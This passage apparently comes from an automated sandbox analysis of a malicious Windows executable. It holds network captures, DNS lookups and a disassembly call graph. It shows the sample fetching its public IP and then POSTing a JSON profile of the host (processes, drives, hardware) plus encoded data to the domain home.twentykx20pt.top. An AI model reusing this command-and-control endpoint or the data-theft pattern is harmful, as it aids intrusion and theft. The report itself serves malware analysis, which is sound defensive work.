                                                Nov 28, 2024 13:09:57.481044054 CET4978880192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:57.600892067 CET804978834.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:58.934475899 CET804978834.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:58.935018063 CET4978880192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:59.058625937 CET804978834.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:59.058725119 CET4978880192.168.2.534.118.84.150

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 28, 2024 13:08:59.688373089 CET6285153192.168.2.51.1.1.1
                                                Nov 28, 2024 13:08:59.688442945 CET6285153192.168.2.51.1.1.1
                                                Nov 28, 2024 13:08:59.826087952 CET53628511.1.1.1192.168.2.5
                                                Nov 28, 2024 13:09:00.238799095 CET53628511.1.1.1192.168.2.5
                                                Nov 28, 2024 13:09:03.969840050 CET6285453192.168.2.51.1.1.1
                                                Nov 28, 2024 13:09:03.969901085 CET6285453192.168.2.51.1.1.1
                                                Nov 28, 2024 13:09:04.815587044 CET53628541.1.1.1192.168.2.5
                                                Nov 28, 2024 13:09:04.815659046 CET53628541.1.1.1192.168.2.5
                                                Nov 28, 2024 13:09:57.217569113 CET6275153192.168.2.51.1.1.1
                                                Nov 28, 2024 13:09:57.217622042 CET6275153192.168.2.51.1.1.1
                                                Nov 28, 2024 13:09:57.359406948 CET53627511.1.1.1192.168.2.5
                                                Nov 28, 2024 13:09:57.359422922 CET53627511.1.1.1192.168.2.5

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Nov 28, 2024 13:08:59.688373089 CET192.168.2.51.1.1.10x355aStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                Nov 28, 2024 13:08:59.688442945 CET192.168.2.51.1.1.10x948Standard query (0)httpbin.org28IN (0x0001)false
                                                Nov 28, 2024 13:09:03.969840050 CET192.168.2.51.1.1.10x3173Standard query (0)home.twentykx20pt.topA (IP address)IN (0x0001)false
                                                Nov 28, 2024 13:09:03.969901085 CET192.168.2.51.1.1.10x5f6cStandard query (0)home.twentykx20pt.top28IN (0x0001)false
                                                Nov 28, 2024 13:09:57.217569113 CET192.168.2.51.1.1.10x456eStandard query (0)home.twentykx20pt.topA (IP address)IN (0x0001)false
                                                Nov 28, 2024 13:09:57.217622042 CET192.168.2.51.1.1.10x758cStandard query (0)home.twentykx20pt.top28IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Nov 28, 2024 13:09:00.238799095 CET1.1.1.1192.168.2.50x355aNo error (0)httpbin.org18.213.123.165A (IP address)IN (0x0001)false
                                                Nov 28, 2024 13:09:00.238799095 CET1.1.1.1192.168.2.50x355aNo error (0)httpbin.org18.208.8.205A (IP address)IN (0x0001)false
                                                Nov 28, 2024 13:09:04.815659046 CET1.1.1.1192.168.2.50x3173No error (0)home.twentykx20pt.top34.118.84.150A (IP address)IN (0x0001)false
                                                Nov 28, 2024 13:09:57.359406948 CET1.1.1.1192.168.2.50x456eNo error (0)home.twentykx20pt.top34.118.84.150A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • httpbin.org
                                                • home.twentykx20pt.top

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.54970534.118.84.150804688C:\Users\user\Desktop\file.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 28, 2024 13:09:04.944519997 CET12360OUTPOST /AMeacCwtwXCqXfwTNSOI1732768477 HTTP/1.1
                                                Host: home.twentykx20pt.top
                                                Accept: */*
                                                Content-Type: application/json
                                                Content-Length: 557653
                                                Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 32 37 39 35 37 34 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                Data Ascii: { "ip": "8.46.123.228", "current_time": "1732795741", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                Nov 28, 2024 13:09:05.064963102 CET2472OUTData Raw: 70 39 41 45 57 77 2b 33 2b 66 77 6f 32 48 32 5c 2f 7a 2b 46 66 73 46 34 6b 5c 2f 34 4a 4f 36 72 34 59 76 42 42 66 66 47 6e 7a 4c 4f 5a 79 74 6e 71 55 50 77 31 4c 57 74 79 4f 53 45 62 50 6a 37 39 78 64 42 51 54 4a 61 79 4d 58 58 61 7a 52 74 4e 44
                                                Data Ascii: p9AEWw+3+fwo2H2\/z+FfsF4k\/4JO6r4YvBBffGnzLOZytnqUPw1LWtyOSEbPj79xdBQTJayMXXazRtNDsmela\/8EslucZ+O\/lk9v8AhWG7\/wB6Guece9fwfiP2mf0IsJXqYbE+NU6Fem7Tp1PDPxfjJdU1fgC0oyXvRnFuMotSi3Fpv+14fs6\/pjVKcatPwfjOnJXUo+IfhXJP7uOLprZppOLumk0fkPRX7M23\/BJQXH
                                                Nov 28, 2024 13:09:05.065013885 CET2472OUTData Raw: 66 32 4b 5c 2f 69 42 2b 78 37 38 51 70 4e 47 31 69 4f 66 58 66 68 37 72 30 39 31 63 65 41 66 48 73 46 73 36 57 47 75 57 45 62 42 6e 30 2b 2b 43 37 30 30 33 78 48 70 69 50 47 6d 71 61 54 4a 4b 37 4b 44 48 65 32 63 74 33 70 39 78 42 64 4e 2b 6a 65
                                                Data Ascii: f2K\/iB+x78QpNG1iOfXfh7r091ceAfHsFs6WGuWEbBn0++C7003xHpiPGmqaTJK7KDHe2ct3p9xBdN+jeGH0tuA\/EbiSlwvicvzDhPMcd7Onk9XN8ThK2CzPGTk4\/2dHE0HFYbG1fdWDp1o+zxlRvD06scVLD0MR+XeLf0LPEbwu4VrcX4bM8s4zyzLnOpnlHJcLjaOPynAwjFvM5YXEKUsXgKLcvr1TDydTA0lHFVaTwkcT
                                                Nov 28, 2024 13:09:05.065071106 CET4944OUTData Raw: 66 36 76 59 6d 5c 2f 5c 2f 41 46 63 56 78 4c 5c 2f 6e 36 59 5c 2f 54 74 30 70 5c 2f 7a 2b 59 5c 2f 5c 2f 4c 4e 4a 44 31 6a 5c 2f 41 4d 4b 48 5c 2f 75 70 38 37 38 79 5c 2f 36 30 51 66 79 39 5c 2f 72 51 61 46 5a 42 35 63 6a 37 45 4f 38 39 68 39 6c
                                                Data Ascii: f6vYm\/\/AFcVxL\/n6Y\/Tt0p\/z+Y\/\/LNJD1j\/AMKH\/up878y\/60Qfy9\/rQaFZB5cj7EO89h9l5+2c\/wCf8mjP7ze6SI+bfzbj\/lhjv\/X\/ADxRtR9+xPkt\/wDpl5\/N5yP8\/jT5N\/Dv5ieXF\/q45f8AU\/5\/zmgBjL+7fy3\/ANXEZfL\/AOe3+I\/\/AFUyST5kR\/LT\/wAj+T9OPU1MzeZ86ZTp\/rM
                                                Nov 28, 2024 13:09:05.065166950 CET4944OUTData Raw: 56 34 66 45 56 34 54 6f 59 52 34 78 34 79 72 53 72 77 77 37 6f 56 66 39 61 66 6f 52 38 53 5a 6a 77 5c 2f 34 42 35 72 68 38 6a 77 75 46 78 66 45 58 45 33 6a 64 6d 50 44 66 44 39 50 48 75 70 48 4c 71 57 59 59 72 67 6e 68 54 4d 4d 52 6a 38 78 39 6a
                                                Data Ascii: V4fEV4ToYR4x4yrSrww7oVf9afoR8SZjw\/4B5rh8jwuFxfEXE3jdmPDfD9PHupHLqWYYrgnhTMMRj8x9jKNeeByrKMszPNK+Hw84V8WsEsHSq0J4hYil0Gl\/8ABRb9p34nW3\/CUfAH\/gmt8Z\/Hvw2vgs2geMPiD8SvC\/wZvtfsJQz2mpab4e1jw14iS8026iAmhvtO1vULNgV2ztuBr1f4T\/HfxD+2JNqnw98Y\/Bz9o
                                                Nov 28, 2024 13:09:05.065252066 CET2472OUTData Raw: 48 70 56 4f 54 39 33 49 36 4f 4c 69 42 5c 2f 39 49 69 6c 38 76 6e 30 5c 2f 2b 74 57 68 70 54 36 5c 2f 4c 39 51 38 74 32 6b 66 35 64 5c 2f 6c 35 6c 7a 36 5c 2f 72 69 71 33 7a 79 66 75 33 54 79 33 5c 2f 35 5a 65 58 5c 2f 4c 39 4f 75 4b 75 4e 5c 2f
                                                Data Ascii: HpVOT93I6OLiB\/9Iil8vn0\/+tWhpT6\/L9Q8t2kf5d\/l5lz6\/riq3zyfu3Ty3\/5ZeX\/L9OuKuN\/q9+zdD5v7o+V7j\/Pf\/CHy\/M2Tfc8z\/Vx\/6j\/R\/rnnHag3535f18ytJ80n39j\/AOx\/y2zj07f1+lDbF3ps\/wBZFj95\/wCTf4\/59Kf5f7uH9x8nvL+4+0fr9P6imLHuj3w\/J+9H+s\/1H\/6vzrb2v
                                                Nov 28, 2024 13:09:05.065268040 CET2472OUTData Raw: 57 63 4e 52 35 4b 46 47 6a 4b 62 78 46 4b 45 4a 54 72 59 69 64 4f 57 4a 78 56 57 57 47 6f 78 6e 58 72 56 4b 6a 56 35 53 5a 5c 2f 62 75 53 2b 45 58 46 48 43 57 51 59 44 4b 36 2b 63 30 2b 4c 4d 54 68 4b 55 34 31 63 78 35 50 71 4f 49 72 38 31 61 70
                                                Data Ascii: WcNR5KFGjKbxFKEJTrYidOWJxVWWGoxnXrVKjV5SZ\/buS+EXFHCWQYDK6+c0+LMThKU41cx5PqOIr81apVjGOErVKkKVDDwnHD4ajDF1nChRpwjZKMV8o\/tDX\/AJPhfR9PViGvtaE7AYw0NjZ3AdTnn\/XXVu\/HdBzjg\/H+3bxjHf1r6J\/aK1W0uPEGhaNb39jeSaZp93cziyuorpYpdQuUhMcjQs4jlC6cjNDIElRWRm
                                                Nov 28, 2024 13:09:05.065371990 CET2472OUTData Raw: 2b 72 63 39 4c 44 30 5c 2f 5a 65 33 34 49 7a 39 56 62 65 77 70 55 75 62 6e 39 68 53 76 7a 38 31 75 52 63 74 72 79 76 2b 66 5c 2f 54 47 79 6a 4c 73 71 2b 6a 48 34 70 5c 2f 32 66 68 59 59 62 32 36 34 49 39 72 79 53 71 53 35 5c 2f 5a 65 49 50 43 33
                                                Data Ascii: +rc9LD0\/Ze34Iz9VbewpUubn9hSvz81uRctryv+f\/TGyjLsq+jH4p\/2fhYYb264I9rySqS5\/ZeIPC3s7+0nO3L7SdrW+LW9lb8c2XPI61FViiv9gz\/Bgr0VJJ2\/H+lRfxp9TQaU+vyPqb9hxdn7YX7NTZ\/5rJ4FHT+9rlqvr71+8Pibxdafsf8A\/BUbxL48+JVxFofwZ\/bm+HXgjw5pvxBv2SDQPDfxi+FWmaZ4Y0n
                                                Nov 28, 2024 13:09:05.185058117 CET4944OUTData Raw: 6b 36 31 4e 34 37 75 76 2b 46 61 33 57 71 65 47 37 7a 5c 2f 41 49 53 53 58 54 78 71 66 6a 48 5c 2f 41 49 52 58 37 50 72 55 55 45 65 75 58 35 6a 2b 30 5c 2f 43 48 68 50 77 37 34 43 38 4a 2b 46 5c 2f 41 33 68 44 53 72 66 51 76 43 66 67 76 77 37 6f
                                                Data Ascii: k61N47uv+Fa3WqeG7z\/AISSXTxqfjH\/AIRX7PrUUEeuX5j+0\/CHhPw74C8J+F\/A3hDSrfQvCfgvw7ovhPwvolo0z2uj+HfDmm22j6JpVs1xLNcNb6fptnbWkLTzSzGOFTLLI5Zj0VfS0qChCmnKblGNNO1atyc0IpaQ51FRfWPKoy+0mf1RlWQUcBhMBTq18fPE4XD5fCr7POM4+pyr4HDwpfusJLGxw0MNOSk54aOHhQrx
                                                Nov 28, 2024 13:09:05.185082912 CET2472OUTData Raw: 6e 72 61 33 45 73 4a 6c 51 6d 4a 6e 74 59 5a 43 68 55 76 46 47 78 4b 44 38 52 77 76 67 33 39 48 62 42 38 58 63 6c 44 67 5c 2f 68 50 5c 2f 57 53 74 67 35 5a 70 48 4b 36 30 38 54 69 73 42 39 54 70 31 36 64 43 57 4b 6f 5a 44 69 73 56 57 79 43 6c 47
                                                Data Ascii: nra3EsJlQmJntYZChUvFGxKD8Rwvg39HbB8XclDg\/hP\/WStg5ZpHK608TisB9Tp16dCWKoZDisVWyClGFepSp\/uMBCcJThaKUot\/0ZjPH36VOYcCuWI4+46\/1Rw2Pp5NUznD08Lgsz+v4nDYjE08FieJsHgsPxRXnWw2FxNRfWMzqQnCjVvJuLR6NJNBN80yosuMEkljxnAycnA9O3OOahNrbv\/qp8ez44\/wAa1\/COh
                                                Nov 28, 2024 13:09:05.185106039 CET2472OUTData Raw: 78 6e 2b 50 70 35 62 6c 74 4c 45 59 50 43 79 78 4e 57 46 61 6f 6e 69 73 78 78 64 48 41 59 48 44 30 36 57 48 70 31 71 39 57 76 69 38 62 69 4b 47 47 6f 55 71 56 4f 63 36 6c 61 72 43 45 59 74 79 52 76 77 78 77 72 78 42 78 6c 6d 30 4d 6a 34 5a 79 79
                                                Data Ascii: xn+Pp5bltLEYPCyxNWFaonisxxdHAYHD06WHp1q9Wvi8biKGGoUqVOc6larCEYtyRvwxwrxBxlm0Mj4ZyyrmuaTw2Lxiw1KpQo8mEwGHqYvHYqtXxVWhhqGGwmFpVK+Ir161OlSpQlOclFNmNX6ifsTf8FJj+xz8K\/EHwzHwZHxHGveP9U8dnWj8Q\/wDhDzZvqfh3wt4eOlDT\/wDhBvFP2lYU8LpeC++22xdr57b7GothcXH
                                                Nov 28, 2024 13:09:56.630199909 CET214INHTTP/1.1 504 Gateway Time-out
                                                content-length: 92
                                                cache-control: no-cache
                                                content-type: text/html
                                                connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.54978834.118.84.150804688C:\Users\user\Desktop\file.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 28, 2024 13:09:57.481044054 CET272OUTPOST /AMeacCwtwXCqXfwTNSOI1732768477 HTTP/1.1
                                                Host: home.twentykx20pt.top
                                                Accept: */*
                                                Content-Type: application/json
                                                Content-Length: 128
                                                Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 5c 2f 68 31 3e 5c 6e 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                Data Ascii: { "id1": "<html><body><h1>504 Gateway Time-out<\/h1>\nThe server didn't respond in time.\n<\/body><\/html>\n", "data": "Done1" }
                                                Nov 28, 2024 13:09:58.934475899 CET353INHTTP/1.1 404 NOT FOUND
                                                server: nginx/1.22.1
                                                date: Thu, 28 Nov 2024 12:09:58 GMT
                                                content-type: text/html; charset=utf-8
                                                content-length: 207
                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.54970418.213.123.1654434688C:\Users\user\Desktop\file.exe
                                                TimestampBytes transferredDirectionData
                                                2024-11-28 12:09:02 UTC52OUTGET /ip HTTP/1.1
                                                Host: httpbin.org
                                                Accept: */*
                                                2024-11-28 12:09:02 UTC224INHTTP/1.1 200 OK
                                                Date: Thu, 28 Nov 2024 12:09:02 GMT
                                                Content-Type: application/json
                                                Content-Length: 31
                                                Connection: close
                                                Server: gunicorn/19.9.0
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Credentials: true
                                                2024-11-28 12:09:02 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 0a 7d 0a
                                                Data Ascii: { "origin": "8.46.123.228"}


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:07:08:56
                                                Start date:28/11/2024
                                                Path:C:\Users\user\Desktop\file.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                Imagebase:0x530000
                                                File size:4'490'752 bytes
                                                MD5 hash:2BA6FE9428DA32103BB44C955939208D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:2.7%
                                                  Dynamic/Decrypted Code Coverage:33.6%
                                                  Signature Coverage:11.4%
                                                  Total number of Nodes:405
                                                  Total number of Limit Nodes:53
                                                  execution_graph 86412 532f17 86420 532f2c 86412->86420 86413 5331d3 86414 532fb3 RegOpenKeyExA 86414->86420 86415 53315c RegEnumKeyExA 86416 5331b2 RegCloseKey 86415->86416 86415->86420 86416->86420 86417 533046 RegOpenKeyExA 86418 533089 RegQueryValueExA 86417->86418 86417->86420 86419 53313b RegCloseKey 86418->86419 86418->86420 86419->86420 86420->86413 86420->86414 86420->86415 86420->86417 86420->86419 86421 5331d7 86424 5331f4 86421->86424 86422 533200 86423 5332dc CloseHandle 86423->86422 86424->86422 86424->86423 86425 568b50 86426 568b6b 86425->86426 86444 568bb5 86425->86444 86427 568bf3 86426->86427 86428 568b8f 86426->86428 86426->86444 86445 56a550 86427->86445 86464 546e40 select 86428->86464 86431 568bfc 86433 568c35 86431->86433 86434 568c1f connect 86431->86434 86441 568cb2 86431->86441 86431->86444 86432 568cd9 SleepEx 86438 568d13 86432->86438 86460 56a150 86433->86460 86434->86433 86435 56a150 getsockname 86440 568dff 86435->86440 86437 568d43 86442 56a150 getsockname 86437->86442 86438->86437 86438->86441 86440->86444 86465 5378b0 closesocket 86440->86465 86441->86435 86441->86440 86441->86444 86442->86444 86443 568ba1 86443->86432 86443->86441 86443->86444 86446 56a575 86445->86446 86449 56a597 86446->86449 86467 5375e0 86446->86467 86448 5378b0 closesocket 86451 56a713 86448->86451 86450 56a811 setsockopt 86449->86450 86456 56a83b 86449->86456 86458 56a69b 86449->86458 86450->86456 86451->86431 86453 56af56 86454 56af5d 86453->86454 86453->86458 86454->86451 86455 56a150 getsockname 86454->86455 86455->86451 86456->86458 86459 56abe1 86456->86459 86473 566be0 8 API calls 86456->86473 86458->86448 86458->86451 86459->86458 86472 5967e0 ioctlsocket 86459->86472 86461 56a15f 86460->86461 86463 56a1d0 86460->86463 86462 56a181 getsockname 86461->86462 86461->86463 86462->86463 86463->86443 86464->86443 86466 5378c5 86465->86466 86466->86444 86468 537607 socket 86467->86468 86469 5375ef 86467->86469 86470 53762b 86468->86470 86469->86468 86471 537643 86469->86471 86470->86449 86471->86449 86472->86453 86473->86459 86774 5695b0 86775 5695c8 86774->86775 86776 5695fd 86774->86776 86775->86776 86777 56a150 getsockname 86775->86777 86777->86776 86778 566ab0 86779 566ad5 86778->86779 86780 566bb4 86779->86780 86782 546fa0 select 86779->86782 86781 5e5ed0 7 API calls 86780->86781 86783 566ba9 86781->86783 86784 566b54 86782->86784 86784->86780 86784->86783 86785 566b5d 86784->86785 86785->86783 86787 5e5ed0 86785->86787 86790 5e5a50 86787->86790 86789 5e5ee5 86789->86785 86791 5e5a58 86790->86791 86796 5e5ea0 86790->86796 86792 5e5b50 86791->86792 86795 5e5b88 86791->86795 86804 5e5a99 86791->86804 86792->86795 86797 5e5b7a 86792->86797 86798 5e5eb4 86792->86798 86793 5e5e96 86823 5f9480 socket ioctlsocket connect getsockname closesocket 86793->86823 86801 5e5cae 86795->86801 86821 5e5ef0 socket ioctlsocket connect getsockname 86795->86821 86796->86789 86813 5e70a0 86797->86813 86824 5e6f10 socket ioctlsocket connect getsockname closesocket 86798->86824 86801->86793 86809 5fa920 86801->86809 86822 5f9320 socket ioctlsocket connect getsockname closesocket 86801->86822 86803 5e5ec2 86803->86803 86804->86795 86804->86804 86806 5e70a0 6 API calls 86804->86806 86820 5e6f10 socket ioctlsocket connect getsockname closesocket 86804->86820 86806->86804 86810 5fa944 86809->86810 86811 5fa94b 86810->86811 86812 5fa977 send 86810->86812 86811->86801 86812->86801 86817 5e70ae 86813->86817 86815 5e71a7 86815->86795 86816 5e717f 86816->86815 86830 5f9320 socket ioctlsocket connect getsockname closesocket 86816->86830 86817->86815 86817->86816 86825 5fa8c0 86817->86825 86829 5e71c0 socket ioctlsocket connect getsockname 86817->86829 86820->86804 86821->86795 86822->86801 86823->86796 86824->86803 86826 5fa8e6 86825->86826 86827 5fa903 recvfrom 86825->86827 86826->86827 86828 5fa8ed 86826->86828 86827->86828 86828->86817 86829->86817 86830->86815 86831 8bb160 Sleep 86832 5329ff FindFirstFileA 86833 532a31 86832->86833 86834 532a5c RegOpenKeyExA 86833->86834 86835 532a93 86834->86835 86836 532ade CharUpperA 86835->86836 86837 532b0a 86836->86837 86838 532bf9 QueryFullProcessImageNameA 86837->86838 86839 532c3b CloseHandle 86838->86839 86840 532c64 86839->86840 86841 532df1 CloseHandle 86840->86841 86842 532e23 86841->86842 86474 533d5e 86475 533d30 86474->86475 86475->86474 86476 533d90 86475->86476 86480 540ab0 86475->86480 86483 53fcb0 6 API calls 86476->86483 86479 533dc1 86484 5405b0 86480->86484 86482 540acd 86482->86475 86483->86479 86485 5407c7 86484->86485 86486 5405bd 86484->86486 86485->86482 86486->86485 86487 5407ef 86486->86487 86488 540707 WSAEventSelect 86486->86488 86494 5376a0 86486->86494 86487->86485 86492 540847 86487->86492 86498 546fa0 86487->86498 86488->86485 86488->86486 86491 5409e8 WSAEnumNetworkEvents 86491->86492 86493 5409d0 WSAEventSelect 86491->86493 86492->86485 86492->86491 86492->86493 86493->86491 86493->86492 86495 5376c0 86494->86495 86496 5376e6 send 86494->86496 86495->86496 86497 5376c9 86495->86497 86496->86497 86497->86486 86500 546fd4 86498->86500 86501 546feb 86498->86501 86499 547207 select 86499->86501 86500->86499 86500->86501 86501->86492 86843 541139 86846 541148 86843->86846 86844 540f69 86849 540f00 86844->86849 86853 56d4d0 socket ioctlsocket connect getsockname closesocket 86844->86853 86845 541527 86845->86844 86852 5422d0 6 API calls 86845->86852 86846->86844 86846->86845 86851 53fec0 6 API calls 86846->86851 86851->86845 86852->86844 86853->86849 86502 53255d 86545 8b9f70 86502->86545 86504 53256c GetSystemInfo 86505 532589 86504->86505 86506 5325a0 GlobalMemoryStatusEx 86505->86506 86507 5325ec 86506->86507 86526 53261b 86507->86526 86547 725023d 86507->86547 86551 72500f4 86507->86551 86560 72501f1 86507->86560 86564 725016e 86507->86564 86568 7250328 86507->86568 86572 725026c 86507->86572 86576 72502ac 86507->86576 86580 72502e3 86507->86580 86584 725022d 86507->86584 86588 72500e5 86507->86588 86598 72501a7 86507->86598 86602 725008a 86507->86602 86612 72501de 86507->86612 86616 725015d 86507->86616 86626 725009c 86507->86626 86636 72500d0 86507->86636 86646 725021d 86507->86646 86650 72500ca 86507->86650 86654 7250291 86507->86654 86658 725020a 86507->86658 86662 725013b 86507->86662 86666 725030c 86507->86666 86670 72502cb 86507->86670 86674 7250145 86507->86674 86678 725018d 86507->86678 86682 725007e 86507->86682 86692 7250205 86507->86692 86696 72500b9 86507->86696 86508 53263c GetDriveTypeA 86510 532655 GetDiskFreeSpaceExA 86508->86510 86508->86526 86509 532762 86511 5327d6 KiUserCallbackDispatcher 86509->86511 86510->86526 86512 5327f8 86511->86512 86513 5328d9 FindFirstFileW 86512->86513 86514 532906 FindNextFileW 86513->86514 86515 532928 86513->86515 86514->86514 86514->86515 86526->86508 86526->86509 86546 8b9f7d 86545->86546 86546->86504 86546->86546 86548 7250278 GetLogicalDrives 86547->86548 86550 7250355 86548->86550 86552 725010c 86551->86552 86706 725011d 86551->86706 86554 7250123 86552->86554 86557 725017c GetLogicalDrives 86552->86557 86555 725012d 86554->86555 86556 725013b GetLogicalDrives 86554->86556 86556->86555 86559 7250355 86557->86559 86561 7250215 GetLogicalDrives 86560->86561 86563 7250355 86561->86563 86565 7250179 GetLogicalDrives 86564->86565 86567 7250355 86565->86567 86569 725032a GetLogicalDrives 86568->86569 86571 7250355 86569->86571 86573 72502a2 GetLogicalDrives 86572->86573 86575 7250355 86573->86575 86577 72502dc GetLogicalDrives 86576->86577 86579 7250355 86577->86579 86581 7250312 GetLogicalDrives 86580->86581 86583 7250355 86581->86583 86585 7250243 GetLogicalDrives 86584->86585 86587 7250355 86585->86587 86589 72500eb 86588->86589 86590 725011d GetLogicalDrives 86589->86590 86591 725010c 86590->86591 86592 7250123 86591->86592 86595 725017c GetLogicalDrives 86591->86595 86593 725012d 86592->86593 86594 725013b GetLogicalDrives 86592->86594 86594->86593 86597 7250355 86595->86597 86599 72501c4 GetLogicalDrives 86598->86599 86601 7250355 86599->86601 86603 72500af 86602->86603 86604 725011d GetLogicalDrives 86603->86604 86605 725010c 86604->86605 86606 7250123 86605->86606 86609 725017c GetLogicalDrives 86605->86609 86607 725012d 86606->86607 86608 725013b GetLogicalDrives 86606->86608 86608->86607 86611 7250355 86609->86611 86613 72501c4 GetLogicalDrives 86612->86613 86615 7250355 86613->86615 86617 72500fd 86616->86617 86623 7250160 GetLogicalDrives 86616->86623 86618 725011d GetLogicalDrives 86617->86618 86619 725010c 86618->86619 86620 7250123 86619->86620 86619->86623 86621 725012d 86620->86621 86622 725013b GetLogicalDrives 86620->86622 86622->86621 86625 7250355 86623->86625 86627 725008c 86626->86627 86628 725011d GetLogicalDrives 86627->86628 86629 725010c 86628->86629 86630 7250123 86629->86630 86633 725017c GetLogicalDrives 86629->86633 86631 725012d 86630->86631 86632 725013b 